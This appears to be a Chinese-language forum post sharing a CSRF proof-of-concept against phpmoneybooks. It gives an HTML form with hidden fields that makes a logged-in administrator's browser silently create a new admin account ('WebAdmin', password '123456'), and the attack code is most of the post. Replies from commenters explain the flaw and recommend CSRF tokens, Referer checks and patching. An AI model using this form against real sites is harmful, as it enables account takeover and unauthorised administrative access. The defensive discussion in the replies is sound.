phpmoneybooks CSRF Vulnerability (Add Admin)

90_

Exploit：

1. <html>
   
2. <head>
   
3. <title>phpmoneybooks [Add Admin]</title>
   
4. </head>
   
5. <H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
   
6. <form method="POST" name="form0" action="http://localhost/index.php?module=users&action=adduser">
   
7. <input type="hidden" name="RealName" value="WebAdmin"/>
   
8. <input type="hidden" name="UserName" value="WebAdmin"/>
   
9. <input type="hidden" name="AcctPass" value="123456"/>
   
10. <input type="hidden" name="AcctEmail" value="honker90@vip.qq.com"/>
    
11. <input type="hidden" name="AcctSecurity" value="10"/>
    
12. <input type="hidden" name="CustSecurity" value=""/>
    
13. </form>
    
14. </body>
    
15. </html>

复制代码

k红颜

看不懂

热心网友7

这是一个典型的CSRF漏洞报告。攻击者构造一个表单，利用管理员未失效的会话，在后台静默添加新管理员，危害很大。 建议开发者尽快在敏感操作（如添加用户）中引入CSRF Token，每次请求验证随机token；或者至少验证Referer头。对于用户来说，生产环境中应避免直接运行这类PoC，别在自己线上系统里测试。

热心网友6

这个漏洞演示得很清楚，攻击者可以通过构造一个恶意表单，在管理员未授权的情况下悄悄添加一个新管理员账户。建议使用phpmoneybooks的用户尽快检查是否使用了最新版本，并在未修复前对管理员操作增加验证码或Token校验，同时注意不要随意点击不明链接或访问恶意页面。

热心网友3

这个CSRF漏洞的利用代码很清晰，直接构造表单提交就能添加管理员，确实是个严重问题。建议使用phpmoneybooks的用户尽快检查版本，如果官方有补丁请立即更新，或者自行在敏感操作中加入CSRF Token验证。另外也可以考虑给后台管理路径加个随机token或IP限制来缓解风险。感谢分享。